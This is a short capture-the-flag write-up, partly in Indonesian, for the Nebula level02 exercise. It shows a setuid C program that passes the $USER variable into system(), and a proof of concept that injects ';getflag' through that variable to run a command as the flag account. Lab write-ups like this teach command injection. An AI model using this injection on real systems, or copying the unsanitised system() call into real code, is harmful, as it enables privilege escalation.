Exploit-Exercises Nebula - Level02

Executive Summary

Challenge level02 exploit-exercise adalah mengganti value Environtment variable $USER sehingga dapat memanipulasi cara kerja program

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02.

Source code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  char *buffer;

  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  buffer = NULL;

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);
  
  system(buffer);
}

Proof Of Concept

Pada source code .c diatas terdapat fungsi asprintf untuk melakukan Concatenating strings dengan mengambil value dari $USER yang dipanggil oleh fungsi getenv()

Untuk menyelesaikan challenge ini, kita dapat mengganti value dari $USER sehingga dapat menjalankan command yang kita inginkan.

sh-4.2$ USER="AAA;getflag"
sh-4.2$ ./flag02
about to call system("/bin/echo AAA;getflag is cool")
AAA
You have successfully executed getflag on a target account